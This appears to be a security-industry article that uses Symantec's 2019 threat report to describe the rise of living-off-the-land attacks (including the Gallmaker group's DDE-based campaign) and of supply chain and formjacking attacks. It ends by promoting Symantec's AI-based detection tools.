As most companies have learned, unhappily, in recent years, hackers and other cyber criminals are nothing if not resourceful. Sometimes that resourcefulness manifests itself in the creation of sophisticated malware code, or perhaps in clever social engineering ploys that trick users into taking risky actions.
When the countermeasures of defenders prove effective, however, resourceful attackers readily turn to more promising avenues of exploitation. Increasingly, those avenues involve attacking trusted software that people are already using, as well as leveraging established supply chains such as software tools vendors and cloud service providers.
Attacks that target installed software tools and operating system features are said to be “living off the land”, as they take build on software that is generally available across the computing landscape. Supply chain attacks are a distinct, but related, attack approach, in that they compromise the offerings of existing and trusted suppliers.
When the countermeasures of defenders prove effective, however, resourceful attackers readily turn to more promising avenues of exploitation.
Living off the land and supply chain attacks have been around for years, but spiked significantly in the past year, according to Symantec’s 2019 Internet Security Threat Report (ISTR). For example, malicious scripts that use the PowerShell task automation and configuration management framework increased by 1,000% during 2018, the ISTR reports. With its installed base of cyber security tools, Symantec itself is blocking an average of 115,000 malicious PowerShell scripts each month.
For their part, supply chain attacks increased by 78% during 2018. “Exploits and vulnerabilities are getting harder to find, so attackers are just weaponizing something that’s already there,” says Orla Cox, director of security response at Symantec, in explaining the rise of both living off the land and supply chain assaults.
In most cases, living off the land attacks are just one element of multi-pronged assaults. During 2018, however, Symantec researchers found a “pure” living off the land attack group, which the researchers dubbed Gallmaker. The attackers focused on government and military targets in Eastern Europe and the Middle East but used no malware in their operations.
Instead, the Gallmaker group sent malicious Office documents to targeted users, most likely using spear-phishing techniques to get users to open the documents and enable their contents. These actions, in turn, let the attackers use the Microsoft Dynamic Data Exchange (DDE) protocol to remotely execute commands in memory on the victim’s computer and to execute other living off the land tools.
Often, the attackers were found to be targeting third-party services commonly used by online retailers such as chatbots or customer review widgets.
As Symantec noted when publicizing its discovery of Gallmaker, the “attackers are hoping to ‘hide in plain sight,’ with their malicious activity hidden in a sea of legitimate processes.”
Perpetrators of supply chain attacks have much the same aim. As Symantec’s ISTR notes, this type of attack can take many forms, “including hijacking software updates and injecting code into legitimate software.” Cloud service providers are also common targets, with the goal being to turn established cloud services into attack vehicles.
Symantec’s ISTR documents a steep rise in formjacking attacks during 2018, with many of them being part of supply chain attacks. Often, the attackers were found to be targeting third-party services commonly used by online retailers such as chatbots or customer review widgets.
Due to the relative ease of using trusted software and channels – and the difficulty in detecting and countering those exploits – Cox says we can expect living off the land and supply chain attacks to become “the new normal.” Despite the inherently stealthy nature of these attacks, however, there are ways to combat them.
Symantec’s ability to discover the Gallmaker living off the land attack illustrates this defensive potential. Gallmaker’s use of living off the land tactics along with publicly available hack tools made it extremely difficult to detect. Symantec was able to discover the attack thanks to the cyber security firm’s Targeted Attack Analytics (TAA) technology.
Part of the company’s Advance Threat Protection portfolio, TAA includes sophisticated artificial intelligence and machine learning technology in order to provide organizations with “virtual analysts” that are able to spot potential threats. In the case of the Gallmaker attack, Symantec’s TAA flagged certain PowerShell commands as suspicious, which ultimately led to the discovery of the group’s living off the land campaign.
Trusted, widely used software tools and supply chains present cyber criminals and other bad actors with almost irresistible attack avenues. Organizations need to understand the methods employed in these attacks and employ an approach that has become common in nuclear weapons negotiations: trust but verify.